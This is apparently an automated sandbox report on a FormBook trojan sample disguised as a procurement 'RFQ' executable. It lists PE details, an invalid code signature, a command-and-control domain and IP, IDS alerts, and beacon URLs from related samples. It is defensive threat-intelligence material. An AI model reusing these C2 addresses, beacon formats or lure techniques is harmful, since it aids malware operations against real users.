                                                  http://www.fontbureau.comRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoreplace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://assets.iv.lt/footer.htmlreplace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.iv.lt/neribotas-svetainiu-talpinimas/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.iv.lt/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.iv.lt/svetainiu-kurimo-irankis/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0RFQ 0400-ENPI-RQMA.exefalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.iv.lt/el-pasto-filtras/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.carterandcone.comlRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/cabarga.htmlNRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cnRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlRFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.iv.lt/vps-serveriai/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.jiyu-kobo.co.jp/RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fontbureau.com/designers8RFQ 0400-ENPI-RQMA.exe, 00000000.00000002.1661786243.00000000073C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://klientams.iv.lt/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000005.00000003.2112503982.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.iv.lt/sertifikatai/replace.exe, 00000005.00000002.2176359316.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, KdcHSkcpIgYD.exe, 00000008.00000002.2898333907.0000000002B04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2892020444.0000000001794000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    79.98.25.1
                                                                                    		www.maxiwalls.comLithuania
                                                                                    		62282RACKRAYUABRakrejusLTtrue

                                                                                    General Information

                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                    Analysis ID:1430324
                                                                                    Start date and time:2024-04-23 14:22:05 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 46s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:10
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:RFQ 0400-ENPI-RQMA.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 84%
                                                                                    • Number of executed functions: 121
                                                                                    • Number of non-executed functions: 259
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • VT rate limit hit for: RFQ 0400-ENPI-RQMA.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    14:22:53API Interceptor1x Sleep call for process: RFQ 0400-ENPI-RQMA.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    79.98.25.1International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.noxnoxhome.com/ve92/?KVvTZtEp=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNSm79P5Sc0NLZLCPEw==&ixo=GL0X
                                                                                    International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.noxnoxhome.com/ve92/?UTU=yvUt0Xc&NtBTjpl=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNReS0v1pTCwd
                                                                                    00726736625241525.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?T6d7v=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe&P9I=5Nqp
                                                                                    Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                    00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                                                                                    Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe
                                                                                    003786546788765.PDF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?F_4=9SV3rDO4hnDB&U3mb=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/Bqbjoiin18dsOQQ==
                                                                                    Copie_de_plata_bancara.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?ILqh=0AsVJSkSvC6-W&yRBmiBA-=45MeeAD4Y8e2mqpl94/vp49GzIZF/JSgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqZm0t1L18dsSRA==
                                                                                    U_prilogu_je_predracun.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?fk0=89DiTmjnfCUhvYsc&kJZ5QC=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                    Iqgbhvnaowuspb.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • www.christmatoy.com/6qne/?D15HD=_t_lMOKbpZu3O9&9WZHdBH=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzITtjVbGwuQSRA==

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    www.maxiwalls.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                    • 79.98.25.1
                                                                                    HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                    • 79.98.25.1

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    RACKRAYUABRakrejusLTINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                    • 79.98.25.1
                                                                                    NQYYUvHu8f.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 195.181.245.38
                                                                                    HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                    • 79.98.25.1
                                                                                    payment form.doc.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 185.5.53.18
                                                                                    International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                    • 79.98.25.1
                                                                                    International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                    • 79.98.25.1
                                                                                    4df902f11590d27189e9113ed654b0481.msiGet hashmaliciousUnknownBrowse
                                                                                    • 212.24.99.48
                                                                                    IMG001.exeGet hashmaliciousXmrigBrowse
                                                                                    • 62.77.152.0
                                                                                    S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                    • 194.135.86.146
                                                                                    l3fh0T2H1h.exeGet hashmaliciousBazaLoader, SmokeLoaderBrowse
                                                                                    • 80.209.233.177

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ 0400-ENPI-RQMA.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1415
                                                                                    Entropy (8bit):5.352427679901606
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                    MD5:3978978DE913FD1C068312697D6E5917
                                                                                    SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                    SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                    SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                                                                    C:\Users\user\AppData\Local\Temp\C3vB7APK

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\replace.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.9566192932571385
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:RFQ 0400-ENPI-RQMA.exe
                                                                                    File size:723'464 bytes
                                                                                    MD5:73b6e5a11aff9e7bd681b55136c5fbcf
                                                                                    SHA1:d8113fa2bd2b2fa43f3920b93f9a5217b9cb69a2
                                                                                    SHA256:3ca71ea7d01b1f1e3613781fcd68b47c09a159af5876c134065bef4d912917a6
                                                                                    SHA512:6450875cf74a6992dac1b880f510a2b46c04978b808e94c2162ee2b1cf8d89686d1f9b59d2c4b8e55e217435e70b405e73d8645a4c75f616d80cbb932d2a93c0
                                                                                    SSDEEP:12288:ijF9WMP0l64aOQ3p2K2pp4o1aCoaCoDVAcN2jWN9uq+V9mYxfY5fkR:ij2MPwc52h5YCXXjN2yD/+V9XNa6
                                                                                    TLSH:A7F42350B2E45F12FABB9BB522968A219730B8CB5431DBDCDDD121CE51A1F01D6A2F0F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B.................0.............F.... ........@.. ....................... ............@................................

                                                                                    File Icon

                                                                                    Icon Hash:526c6a52d0e4f047

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4ad246
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0xECE1BD42 [Thu Dec 8 21:10:26 2095 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                    Version:3
                                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    xor al, 47h
                                                                                    inc ecx
                                                                                    inc edi
                                                                                    dec eax
                                                                                    inc ebp
                                                                                    xor eax, 484E3531h
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [edx], dh
                                                                                    push esp
                                                                                    xor eax, 43433753h
                                                                                    xor al, 52h
                                                                                    cmp byte ptr [00000000h], dh
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xad1f30x4f.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1b80.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xad4000x3608
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xab93c0x70.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000xab26c0xab400080ed6a441b548d49a36bd1dee2effc1False0.9654539233576642data7.96453329112393IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0xae0000x1b800x1c00b55871f696da632f0c30d95397a648f4False0.34988839285714285data5.579515054448806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xb00000xc0x20041336c745dd5e354f194e3be7ccdfbd5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0xae1600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.2675891181988743
                                                                                    RT_ICON0xaf2080x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5106382978723404
                                                                                    RT_GROUP_ICON0xaf6700x22data0.9411764705882353
                                                                                    RT_VERSION0xaf6940x300MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"0.4609375
                                                                                    RT_MANIFEST0xaf9940x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    04/23/24-14:23:35.363733TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.479.98.25.1

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 23, 2024 14:23:35.133434057 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.360712051 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.360879898 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.363733053 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.590857029 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592740059 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592761040 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592780113 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592797995 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592814922 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592840910 CEST804974379.98.25.1192.168.2.4
                                                                                    Apr 23, 2024 14:23:35.592861891 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.592941999 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.592966080 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.596626043 CEST4974380192.168.2.479.98.25.1
                                                                                    Apr 23, 2024 14:23:35.823740959 CEST804974379.98.25.1192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 23, 2024 14:23:34.550977945 CEST5946553192.168.2.41.1.1.1
                                                                                    Apr 23, 2024 14:23:35.118628979 CEST53594651.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Apr 23, 2024 14:23:34.550977945 CEST192.168.2.41.1.1.10x5dc3Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Apr 23, 2024 14:23:35.118628979 CEST1.1.1.1192.168.2.40x5dc3No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.maxiwalls.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
